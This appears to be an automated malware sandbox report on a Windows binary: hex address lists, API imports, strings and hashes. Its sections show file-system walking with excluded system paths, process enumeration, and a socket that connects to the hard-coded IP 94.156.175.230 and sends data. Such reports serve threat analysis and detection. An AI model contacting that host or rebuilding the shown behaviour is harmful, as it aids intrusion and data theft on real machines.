                                                                    0x00e64db8
                                                                    0x00e64dc4
                                                                    0x00e64dcd
                                                                    0x00e64dd6
                                                                    0x00e64ddf
                                                                    0x00e64de2
                                                                    0x00e64de6
                                                                    0x00e64de6
                                                                    0x00e64de6
                                                                    0x00e64de9
                                                                    0x00e64dec
                                                                    0x00e64dee
                                                                    0x00e64df1
                                                                    0x00e64df4
                                                                    0x00e64dfa
                                                                    0x00e64dfc
                                                                    0x00000000
                                                                    0x00e64dfc
                                                                    0x00e64cd6
                                                                    0x00e64cd6
                                                                    0x00e64cdb
                                                                    0x00e64ce0
                                                                    0x00e64ce0
                                                                    0x00e64ce6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e64ceb
                                                                    0x00e64d02
                                                                    0x00e64d02
                                                                    0x00e64ced
                                                                    0x00e64ced
                                                                    0x00e64cf1
                                                                    0x00e64cf5
                                                                    0x00000000
                                                                    0x00e64cf7
                                                                    0x00e64cf7
                                                                    0x00e64cfa
                                                                    0x00e64d00
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e64d00
                                                                    0x00e64cf5
                                                                    0x00e64d0b
                                                                    0x00e64d0d
                                                                    0x00e64d13
                                                                    0x00e64d18
                                                                    0x00e64d1a
                                                                    0x00e64d20
                                                                    0x00e64d20
                                                                    0x00e64d26
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e64d2b
                                                                    0x00e64d42
                                                                    0x00e64d42
                                                                    0x00e64d2d
                                                                    0x00e64d2d
                                                                    0x00e64d31
                                                                    0x00e64d35
                                                                    0x00000000
                                                                    0x00e64d37
                                                                    0x00e64d37
                                                                    0x00e64d3a
                                                                    0x00e64d40
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e64d40
                                                                    0x00e64d35
                                                                    0x00e64d4b
                                                                    0x00e64d4d
                                                                    0x00e64d59
                                                                    0x00e64d60
                                                                    0x00e64d65
                                                                    0x00e64d65
                                                                    0x00000000
                                                                    0x00e64d4d
                                                                    0x00e64d46
                                                                    0x00e64d48
                                                                    0x00e64d48
                                                                    0x00000000
                                                                    0x00e64d48
                                                                    0x00000000
                                                                    0x00e64d0d
                                                                    0x00e64d06
                                                                    0x00e64d08
                                                                    0x00e64d08
                                                                    0x00000000
                                                                    0x00e64d08
                                                                    0x00000000
                                                                    0x00e64c60
                                                                    0x00e64c60
                                                                    0x00e64c63
                                                                    0x00e64c69
                                                                    0x00000000
                                                                    0x00e64c6b
                                                                    0x00e64c6b
                                                                    0x00e64c6b
                                                                    0x00e64c6d
                                                                    0x00e64c6f
                                                                    0x00e64c75
                                                                    0x00e64c78
                                                                    0x00e64c7e
                                                                    0x00e64c7e
                                                                    0x00000000
                                                                    0x00e64e00
                                                                    0x00e64e0d
                                                                    0x00e64e13
                                                                    0x00e64e1b
                                                                    0x00e64e21
                                                                    0x00e64e26
                                                                    0x00e64e2b
                                                                    0x00e64e2e
                                                                    0x00e64e36
                                                                    0x00e64e3f
                                                                    0x00e64e59
                                                                    0x00e64e5c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e64edc
                                                                    0x00e64ee2
                                                                    0x00e64ee8
                                                                    0x00e64ef4
                                                                    0x00e64efc
                                                                    0x00e64f02
                                                                    0x00e64f09
                                                                    0x00e64f0b
                                                                    0x00e64f0f
                                                                    0x00e64f12
                                                                    0x00e64f18
                                                                    0x00e64f1a
                                                                    0x00e64f22
                                                                    0x00e65764
                                                                    0x00e65764
                                                                    0x00e65767
                                                                    0x00e65772
                                                                    0x00e65775
                                                                    0x00e65780
                                                                    0x00e65785
                                                                    0x00e65788
                                                                    0x00e6578a
                                                                    0x00000000
                                                                    0x00e65790
                                                                    0x00e65790
                                                                    0x00e6579b
                                                                    0x00e6579f
                                                                    0x00e657a5
                                                                    0x00e657aa
                                                                    0x00e657af
                                                                    0x00e657ba
                                                                    0x00e657bd
                                                                    0x00e657c2
                                                                    0x00e657cc
                                                                    0x00e657d1
                                                                    0x00e657dc
                                                                    0x00e657e1
                                                                    0x00e657e7
                                                                    0x00e657ea
                                                                    0x00e657ec
                                                                    0x00e657ee
                                                                    0x00e65a6a
                                                                    0x00e65a70
                                                                    0x00e65a75
                                                                    0x00e65a75
                                                                    0x00e65a7f
                                                                    0x00e65a84
                                                                    0x00e65a8b
                                                                    0x00e65a90
                                                                    0x00e65a9a
                                                                    0x00000000
                                                                    0x00e65800
                                                                    0x00e65800
                                                                    0x00e65800
                                                                    0x00e65803
                                                                    0x00e6580f
                                                                    0x00e65814
                                                                    0x00e65817
                                                                    0x00e6581b
                                                                    0x00e65822
                                                                    0x00e6596e
                                                                    0x00e6596e
                                                                    0x00e65971
                                                                    0x00e65978
                                                                    0x00e6597a
                                                                    0x00e65986
                                                                    0x00e6598c
                                                                    0x00e65993
                                                                    0x00e6599a
                                                                    0x00e659a1
                                                                    0x00e659a7
                                                                    0x00e659ae
                                                                    0x00e659b4
                                                                    0x00e659ba
                                                                    0x00e659bd
                                                                    0x00e659d3
                                                                    0x00e659d6
                                                                    0x00e659db
                                                                    0x00e659e0
                                                                    0x00e659ee
                                                                    0x00e659ee
                                                                    0x00e659f0
                                                                    0x00e659fe
                                                                    0x00e65a15
                                                                    0x00e65a1a
                                                                    0x00e65a20
                                                                    0x00e65a23
                                                                    0x00e65a29
                                                                    0x00e659bf
                                                                    0x00e659bf
                                                                    0x00e659c2
                                                                    0x00e659c7
                                                                    0x00e659c7
                                                                    0x00e65a2f
                                                                    0x00e65a32
                                                                    0x00e65a35
                                                                    0x00e65a39
                                                                    0x00e65a49
                                                                    0x00e65a4e
                                                                    0x00000000
                                                                    0x00e65828
                                                                    0x00e65828
                                                                    0x00e6582f
                                                                    0x00000000
                                                                    0x00e65835
                                                                    0x00e65835
                                                                    0x00e6583e
                                                                    0x00e65846
                                                                    0x00e65849
                                                                    0x00e65ac9
                                                                    0x00000000
                                                                    0x00e6584f
                                                                    0x00e6584f
                                                                    0x00e6585e
                                                                    0x00e65879
                                                                    0x00e65884
                                                                    0x00e65887
                                                                    0x00e6588d
                                                                    0x00e65891
                                                                    0x00e65897
                                                                    0x00e65899
                                                                    0x00e65899
                                                                    0x00e6589b
                                                                    0x00e658a6
                                                                    0x00e658ac
                                                                    0x00e658ae
                                                                    0x00e658b8
                                                                    0x00e658bb
                                                                    0x00e658c5
                                                                    0x00e658cf
                                                                    0x00e658d2
                                                                    0x00e658dc
                                                                    0x00e658e3
                                                                    0x00e658e3
                                                                    0x00e658e6
                                                                    0x00e658e9
                                                                    0x00e658e9
                                                                    0x00e658fd
                                                                    0x00e65908
                                                                    0x00e6590b
                                                                    0x00e65911
                                                                    0x00e65918
                                                                    0x00e6591f
                                                                    0x00e65922
                                                                    0x00e65928
                                                                    0x00e6592e
                                                                    0x00e65938
                                                                    0x00e65943
                                                                    0x00e65946
                                                                    0x00e6594c
                                                                    0x00e65952
                                                                    0x00e6595c
                                                                    0x00e65961
                                                                    0x00e65968
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e65968
                                                                    0x00e65849
                                                                    0x00e6582f
                                                                    0x00000000
                                                                    0x00e65a51
                                                                    0x00e65a51
                                                                    0x00e65a5b
                                                                    0x00e65a60
                                                                    0x00e65a62
                                                                    0x00e65a62
                                                                    0x00000000
                                                                    0x00e65800
                                                                    0x00e657ee
                                                                    0x00e64f30
                                                                    0x00e64f30
                                                                    0x00e64f30
                                                                    0x00e64f33
                                                                    0x00e64f35
                                                                    0x00e64f3e
                                                                    0x00e64f44
                                                                    0x00e64f44
                                                                    0x00e64f47
                                                                    0x00e64f4a
                                                                    0x00e64f55
                                                                    0x00e64f57
                                                                    0x00e64f5d
                                                                    0x00e64f62
                                                                    0x00e64f68
                                                                    0x00e64f70
                                                                    0x00e64f7a
                                                                    0x00e64f7d
                                                                    0x00e64f7d
                                                                    0x00e64f80
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e64f82
                                                                    0x00000000
                                                                    0x00e64f80
                                                                    0x00e6501e
                                                                    0x00e6501e
                                                                    0x00e65024
                                                                    0x00e65024
                                                                    0x00e6502f
                                                                    0x00e65035
                                                                    0x00e65043
                                                                    0x00e65049
                                                                    0x00e6504b
                                                                    0x00e6504e
                                                                    0x00e65054
                                                                    0x00e65056
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e65058
                                                                    0x00e6505e
                                                                    0x00e6505e
                                                                    0x00e65066
                                                                    0x00e65079
                                                                    0x00e65085
                                                                    0x00e650ab
                                                                    0x00e650b0
                                                                    0x00e650b5
                                                                    0x00e650b8
                                                                    0x00e650be
                                                                    0x00e650c4
                                                                    0x00e650ca
                                                                    0x00e650d0
                                                                    0x00e650d2
                                                                    0x00e6510f
                                                                    0x00e6510f
                                                                    0x00e65112
                                                                    0x00e65115
                                                                    0x00e65117
                                                                    0x00e65121
                                                                    0x00e65121
                                                                    0x00e65127
                                                                    0x00e6512c
                                                                    0x00e6512e
                                                                    0x00e65134
                                                                    0x00e6513a
                                                                    0x00e65140
                                                                    0x00000000
                                                                    0x00e65142
                                                                    0x00e65142
                                                                    0x00e6514a
                                                                    0x00e6514f
                                                                    0x00e65152
                                                                    0x00e65154
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e65160
                                                                    0x00e65163
                                                                    0x00e65169
                                                                    0x00e6516f
                                                                    0x00000000
                                                                    0x00e65171
                                                                    0x00e65171
                                                                    0x00e65174
                                                                    0x00000000
                                                                    0x00e65174
                                                                    0x00000000
                                                                    0x00e6516f
                                                                    0x00e6525f
                                                                    0x00e65264
                                                                    0x00e65267
                                                                    0x00e65274
                                                                    0x00e6527a
                                                                    0x00e6527f
                                                                    0x00e65282
                                                                    0x00e65284
                                                                    0x00000000
                                                                    0x00e6528a
                                                                    0x00e6528a
                                                                    0x00e65294
                                                                    0x00e65299
                                                                    0x00e652a6
                                                                    0x00e652ac
                                                                    0x00e652ac
                                                                    0x00e652af
                                                                    0x00e652b5
                                                                    0x00e652c0
                                                                    0x00e652c0
                                                                    0x00e652c3
                                                                    0x00e652c6
                                                                    0x00e652c6
                                                                    0x00e652cb
                                                                    0x00e652cb
                                                                    0x00e652d2
                                                                    0x00e652d4
                                                                    0x00e652da
                                                                    0x00e652e0
                                                                    0x00e652e2
                                                                    0x00e652e4
                                                                    0x00e652ed
                                                                    0x00e652ee
                                                                    0x00e652f3
                                                                    0x00e652f6
                                                                    0x00e652fc
                                                                    0x00e65302
                                                                    0x00e65302
                                                                    0x00e6530c
                                                                    0x00e65312
                                                                    0x00e65328
                                                                    0x00e6532d
                                                                    0x00e65330
                                                                    0x00e65334
                                                                    0x00e6533a
                                                                    0x00e65343
                                                                    0x00e65349
                                                                    0x00000000
                                                                    0x00e6534f
                                                                    0x00e6534f
                                                                    0x00e65355
                                                                    0x00e6535f
                                                                    0x00e65363
                                                                    0x00e65365
                                                                    0x00e65374
                                                                    0x00e65376
                                                                    0x00e65386
                                                                    0x00e6538c
                                                                    0x00e6538f
                                                                    0x00e65399
                                                                    0x00e6539f
                                                                    0x00e653a9
                                                                    0x00e653ac
                                                                    0x00e653af
                                                                    0x00e653b1
                                                                    0x00e653b4
                                                                    0x00e653b7
                                                                    0x00e653b9
                                                                    0x00e653bf
                                                                    0x00e653c4
                                                                    0x00e653c8
                                                                    0x00000000
                                                                    0x00e653c8
                                                                    0x00e65349
                                                                    0x00e65284
                                                                    0x00e65119
                                                                    0x00e65119
                                                                    0x00e6511f
                                                                    0x00e65177
                                                                    0x00e65183
                                                                    0x00e65189
                                                                    0x00e6518b
                                                                    0x00e655d3
                                                                    0x00e655d3
                                                                    0x00e655d8
                                                                    0x00e655e5
                                                                    0x00e655eb
                                                                    0x00e655f0
                                                                    0x00e655f3
                                                                    0x00e655f5
                                                                    0x00000000
                                                                    0x00e655fb
                                                                    0x00e655fb
                                                                    0x00e65605
                                                                    0x00e65612
                                                                    0x00e6561a
                                                                    0x00e65620
                                                                    0x00e65620
                                                                    0x00e65623
                                                                    0x00e65629
                                                                    0x00e65630
                                                                    0x00e65630
                                                                    0x00e65633
                                                                    0x00e65636
                                                                    0x00e65636
                                                                    0x00e6563b
                                                                    0x00e6563b
                                                                    0x00e65642
                                                                    0x00e65644
                                                                    0x00e6564a
                                                                    0x00e65650
                                                                    0x00e65652
                                                                    0x00e65654
                                                                    0x00e6565d
                                                                    0x00e6565e
                                                                    0x00e65663
                                                                    0x00e65666
                                                                    0x00e6566c
                                                                    0x00e65672
                                                                    0x00e65672
                                                                    0x00e6567c
                                                                    0x00e65682
                                                                    0x00e65698
                                                                    0x00e6569d
                                                                    0x00e656a0
                                                                    0x00e656a4
                                                                    0x00e656aa
                                                                    0x00e656b3
                                                                    0x00e656b9
                                                                    0x00000000
                                                                    0x00e656bf
                                                                    0x00e656bf
                                                                    0x00e656c5
                                                                    0x00e656cf
                                                                    0x00e656d3
                                                                    0x00e656d5
                                                                    0x00e656e4
                                                                    0x00e656e6
                                                                    0x00e656f6
                                                                    0x00e656fc
                                                                    0x00e656ff
                                                                    0x00e65703
                                                                    0x00e65709
                                                                    0x00e6570f
                                                                    0x00e65719
                                                                    0x00e65719
                                                                    0x00e65719
                                                                    0x00e6571c
                                                                    0x00e6571f
                                                                    0x00e65721
                                                                    0x00e65724
                                                                    0x00e65727
                                                                    0x00e65729
                                                                    0x00e6572f
                                                                    0x00e65734
                                                                    0x00e65738
                                                                    0x00000000
                                                                    0x00e65738
                                                                    0x00e656b9
                                                                    0x00e65191
                                                                    0x00e65191
                                                                    0x00e65197
                                                                    0x00000000
                                                                    0x00e6519d
                                                                    0x00e6519d
                                                                    0x00e6519f
                                                                    0x00e65466
                                                                    0x00e65466
                                                                    0x00e6546b
                                                                    0x00e65478
                                                                    0x00e6547e
                                                                    0x00e65483
                                                                    0x00e65486
                                                                    0x00e65488
                                                                    0x00000000
                                                                    0x00e6548e
                                                                    0x00e6548e
                                                                    0x00e65498
                                                                    0x00e654a5
                                                                    0x00e654ad
                                                                    0x00e654b3
                                                                    0x00e654b3
                                                                    0x00e654b6
                                                                    0x00e654bc
                                                                    0x00e654c0
                                                                    0x00e654c0
                                                                    0x00e654c3
                                                                    0x00e654c6
                                                                    0x00e654c6
                                                                    0x00e654cb
                                                                    0x00e654cb
                                                                    0x00e654d2
                                                                    0x00e654d4
                                                                    0x00e654da
                                                                    0x00e654e0
                                                                    0x00e654e2
                                                                    0x00e654e4
                                                                    0x00e654ed
                                                                    0x00e654ee
                                                                    0x00e654f3
                                                                    0x00e654f6
                                                                    0x00e654fc
                                                                    0x00e65502
                                                                    0x00e65502
                                                                    0x00e6550c
                                                                    0x00e65512
                                                                    0x00e65528
                                                                    0x00e6552d
                                                                    0x00e65530
                                                                    0x00e65534
                                                                    0x00e6553a
                                                                    0x00e65543
                                                                    0x00e65549
                                                                    0x00000000
                                                                    0x00e6554f
                                                                    0x00e6554f
                                                                    0x00e65555
                                                                    0x00e6555f
                                                                    0x00e65563
                                                                    0x00e65565
                                                                    0x00e65574
                                                                    0x00e65576
                                                                    0x00e65586
                                                                    0x00e6558c
                                                                    0x00e6558f
                                                                    0x00e65599
                                                                    0x00e6559f
                                                                    0x00e655a9
                                                                    0x00e655ac
                                                                    0x00e655af
                                                                    0x00e655b1
                                                                    0x00e655b4
                                                                    0x00e655b7
                                                                    0x00e655b9
                                                                    0x00e655bf
                                                                    0x00e655c4
                                                                    0x00e655c8
                                                                    0x00e6573e
                                                                    0x00e6573e
                                                                    0x00e65743
                                                                    0x00000000
                                                                    0x00e65743
                                                                    0x00e65549
                                                                    0x00e651a5
                                                                    0x00e651a5
                                                                    0x00e651ab
                                                                    0x00000000
                                                                    0x00e651b1
                                                                    0x00e651b1
                                                                    0x00e651b3
                                                                    0x00e653d3
                                                                    0x00e653d3
                                                                    0x00e653d8
                                                                    0x00e653e5
                                                                    0x00e653eb
                                                                    0x00e653f0
                                                                    0x00e653f3
                                                                    0x00e653f5
                                                                    0x00000000
                                                                    0x00e653fb
                                                                    0x00e653fb
                                                                    0x00e6540e
                                                                    0x00e6541f
                                                                    0x00e65425
                                                                    0x00e6542a
                                                                    0x00e6543b
                                                                    0x00e65440
                                                                    0x00e6544a
                                                                    0x00e6544f
                                                                    0x00e65459
                                                                    0x00e6545e
                                                                    0x00000000
                                                                    0x00e6545e
                                                                    0x00e651b9
                                                                    0x00e651b9
                                                                    0x00e651c7
                                                                    0x00e651c7
                                                                    0x00e651cc
                                                                    0x00e651d8
                                                                    0x00e651de
                                                                    0x00e651e3
                                                                    0x00e651e6
                                                                    0x00e651e8
                                                                    0x00e65ace
                                                                    0x00e65ace
                                                                    0x00e65acf
                                                                    0x00000000
                                                                    0x00e651ee
                                                                    0x00e651ee
                                                                    0x00e65201
                                                                    0x00e6520f
                                                                    0x00e65215
                                                                    0x00e6521a
                                                                    0x00e6522b
                                                                    0x00e65230
                                                                    0x00e6523a
                                                                    0x00e6523f
                                                                    0x00e65249
                                                                    0x00e6524e
                                                                    0x00000000
                                                                    0x00e6524e
                                                                    0x00e651bb
                                                                    0x00e651bb
                                                                    0x00e651c1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e651c1
                                                                    0x00e651b9
                                                                    0x00e651b3
                                                                    0x00e651ab
                                                                    0x00e6519f
                                                                    0x00e65197
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6511f
                                                                    0x00e650e0
                                                                    0x00e650e0
                                                                    0x00e650e8
                                                                    0x00e650ed
                                                                    0x00e650f0
                                                                    0x00e650f2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e650fe
                                                                    0x00e65101
                                                                    0x00e65107
                                                                    0x00e6510d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6510d
                                                                    0x00000000
                                                                    0x00e650e0
                                                                    0x00000000
                                                                    0x00e65746
                                                                    0x00e6574c
                                                                    0x00e65751
                                                                    0x00e65753
                                                                    0x00e65756
                                                                    0x00e6575c
                                                                    0x00e6575c
                                                                    0x00000000
                                                                    0x00e64f30
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e64e41
                                                                    0x00e64e47
                                                                    0x00e64e48
                                                                    0x00e64e4e
                                                                    0x00e64e64
                                                                    0x00e64e69
                                                                    0x00e64e7a
                                                                    0x00e64e7f
                                                                    0x00e64e92
                                                                    0x00e64e97
                                                                    0x00e64e9a
                                                                    0x00e64ea2
                                                                    0x00e64ea4
                                                                    0x00e64ea4
                                                                    0x00e64eaa
                                                                    0x00e64eaf
                                                                    0x00e64eb9
                                                                    0x00e64ebe
                                                                    0x00e64ec8
                                                                    0x00e64ecd
                                                                    0x00e64ed7
                                                                    0x00000000
                                                                    0x00e64ed7
                                                                    0x00e64bf1
                                                                    0x00000000

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 00E64BD8
                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00E64E0D
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00E64E15
                                                                    • FindClose.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00E64EE2
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00E64F87
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E65249
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E65459
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6573E
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E657DC
                                                                      • Part of subcall function 00EAEBD8: _free.LIBCMT ref: 00EAEBEB
                                                                    • GetVolumeNameForVolumeMountPointW.KERNEL32(00000000,?,00000032,?,?,?,?,00ED9CA4,00000001,?,?,?,?,?,00000000), ref: 00E658A6
                                                                    • GetCurrentThread.KERNEL32 ref: 00E65D35
                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,\programdata\microsoft\crypto\,?,?,?,?,00000000), ref: 00E65D3C
                                                                    • __Init_thread_footer.LIBCMT ref: 00E660A6
                                                                    • __Init_thread_footer.LIBCMT ref: 00E660FE
                                                                    Strings
                                                                    • \program files\windows defender\, xrefs: 00E65C9A
                                                                    • list too long, xrefs: 00E65AD4
                                                                    • \programdata\microsoft\crypto\, xrefs: 00E65BAD
                                                                    • \tsconfig.txt, xrefs: 00E6607E
                                                                    • \programdata\microsoft\user account pictures\, xrefs: 00E65CCE
                                                                    • \programdata\dat, xrefs: 00E65B72
                                                                    • in Exploreing Folder, xrefs: 00E64E6F
                                                                    • \\users\\[^\\]*\\appdata\\locallow\\microsoft\\, xrefs: 00E65C07
                                                                    • \tsexceptions.txt, xrefs: 00E660D6
                                                                    • \\users\\[^\\]*\\appdata\\local\\packages\\, xrefs: 00E65BE7
                                                                    • \programdata\microsoft\windows\caches, xrefs: 00E65C66
                                                                    • \programdata\, xrefs: 00E65D02
                                                                    • \\users\\[^\\]*\\appdata\\roaming\\microsoft\\windows\\themes\\, xrefs: 00E65C27
                                                                    • \\users\\[^\\]*\\ntuser.dat[^\\]*$, xrefs: 00E65BC7
                                                                    • \\users\\[^\\]*\\appdata\\local\\tiledatalayer\\, xrefs: 00E65C47
                                                                    • \programdata\adobe\extension manager cc\logs\, xrefs: 00E65B55
                                                                    • \programdata\microsoft\windows\apprepository\, xrefs: 00E65CB4
                                                                    • \program files\windowsapps\, xrefs: 00E65C7D
                                                                    • \users\administrator\appdata\local\microsoft\windows\, xrefs: 00E65D1C
                                                                    • \programdata\microsoft\windows\systemdata\, xrefs: 00E65CE8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Mtx_unlock$Find$ErrorFileInit_thread_footerLastThreadVolume$CloseCurrentFirstMountNameNextPointPriority_free
                                                                    • String ID: \\users\\[^\\]*\\appdata\\local\\packages\\$\\users\\[^\\]*\\appdata\\local\\tiledatalayer\\$\\users\\[^\\]*\\appdata\\locallow\\microsoft\\$\\users\\[^\\]*\\appdata\\roaming\\microsoft\\windows\\themes\\$\\users\\[^\\]*\\ntuser.dat[^\\]*$$\program files\windows defender\$\program files\windowsapps\$\programdata\$\programdata\adobe\extension manager cc\logs\$\programdata\dat$\programdata\microsoft\crypto\$\programdata\microsoft\user account pictures\$\programdata\microsoft\windows\apprepository\$\programdata\microsoft\windows\caches$\programdata\microsoft\windows\systemdata\$\tsconfig.txt$\tsexceptions.txt$\users\administrator\appdata\local\microsoft\windows\$in Exploreing Folder$list too long
                                                                    • API String ID: 411288239-4104030528
                                                                    • Opcode ID: f9afc6d9cfddbdcadb38081b4b1b290d014684ebd6582c0bdfb765d4067d4365
                                                                    • Instruction ID: d5f79301721e1df83aa0ac0e155112ee33b2e852e8427bed3a0050f39e7abe32
                                                                    • Opcode Fuzzy Hash: f9afc6d9cfddbdcadb38081b4b1b290d014684ebd6582c0bdfb765d4067d4365
                                                                    • Instruction Fuzzy Hash: E7D27A70900258CFDB25DB28D885BDDBBB4AF19304F1451E9E409BB292EB71AF85CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00E6DE6D
                                                                    • inet_addr.WS2_32(94.156.175.230), ref: 00E6DE7A
                                                                    • htons.WS2_32(00000050), ref: 00E6DE8E
                                                                    • connect.WS2_32(00000000,?,00000010), ref: 00E6DE9F
                                                                    • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000004), ref: 00E6DEC5
                                                                    • setsockopt.WS2_32(00000000,0000FFFF,00001005,0000EA60,00000004), ref: 00E6DEDC
                                                                    • send.WS2_32(00000000,?,?,00000000), ref: 00E6DEF4
                                                                    • send.WS2_32(00000000,00F29248,00000000), ref: 00E6DF17
                                                                    • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00E6E052
                                                                    • send.WS2_32(00000000,00000000,00000004,00000000), ref: 00E6E0EF
                                                                    • send.WS2_32(00000000,?,00000000,00000000), ref: 00E6E105
                                                                    • recv.WS2_32(00000000,?,00000005,00000008), ref: 00E6E114
                                                                    • closesocket.WS2_32(00000000), ref: 00E6E132
                                                                    • closesocket.WS2_32(00000000), ref: 00E6E16D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: send$closesocketsetsockopt$connecthtonsinet_addrrecvsocket
                                                                    • String ID: 94.156.175.230$saved
                                                                    • API String ID: 1790073436-4207706820
                                                                    • Opcode ID: 971156754b886fe52f6fdcd41b7517c59464b27e7b731b0b8aefd6562ef39e8f
                                                                    • Instruction ID: 6992be5af76a57ede0f756d7066239a25b5a861ee030128b691543febaaa077c
                                                                    • Opcode Fuzzy Hash: 971156754b886fe52f6fdcd41b7517c59464b27e7b731b0b8aefd6562ef39e8f
                                                                    • Instruction Fuzzy Hash: 10B15570A05259EFDB00CFA5DC94BEEBBF4EF15300F544029E405BB292C775AA4ACBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00E840D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00EE22E5,00000000,00E84B93,2B749D79,?,00000000), ref: 00E84100
                                                                      • Part of subcall function 00E840D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00EE22E5), ref: 00E8411B
                                                                      • Part of subcall function 00E840D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00EE22E5), ref: 00E8413B
                                                                      • Part of subcall function 00E840D0: CreateThread.KERNEL32 ref: 00E84159
                                                                    • EnumProcesses.PSAPI(00000000,00000320,00000000), ref: 00E8571A
                                                                    • OpenProcess.KERNEL32(00001040,00000000,00000000), ref: 00E8576A
                                                                    • NtQuerySystemInformation.NTDLL ref: 00E857F8
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E85995
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E85A34
                                                                    • SetEvent.KERNEL32(?), ref: 00E85AE7
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E85AF2
                                                                    • CloseHandle.KERNEL32(?), ref: 00E85AFB
                                                                    • CloseHandle.KERNEL32(?), ref: 00E85B04
                                                                    • CloseHandle.KERNEL32(?), ref: 00E85B0D
                                                                    • CloseHandle.KERNEL32(?), ref: 00E85B16
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseHandle$CreateEvent$EnumInformationObjectOpenProcessProcessesQuerySingleSystemThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3617269218-0
                                                                    • Opcode ID: 5b7254652aea365f1182dde777baecba0c7794000b36fe569fe1a49641e88a28
                                                                    • Instruction ID: 33ba805869e97e24d00e275ba2a4b97b1c4bac948def69d82a72f937688fa6e8
                                                                    • Opcode Fuzzy Hash: 5b7254652aea365f1182dde777baecba0c7794000b36fe569fe1a49641e88a28
                                                                    • Instruction Fuzzy Hash: 29E18EB2D00608DFCF15EF94CC85AADBBB5FF48314F249269E40ABB250EB356945CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000000,00000000,00000004,00000080,00000000,?,?,00EE3B80,?,00000000,00EE3B80,?,?), ref: 00E83F67
                                                                    • NtQuerySystemInformation.NTDLL(?,?,?,00EE3B80), ref: 00E83FC8
                                                                    • CloseHandle.KERNEL32(00EE3B80,?,?,?,?,?,?,00EE3B80,?,00000000,00EE3B80), ref: 00E8404C
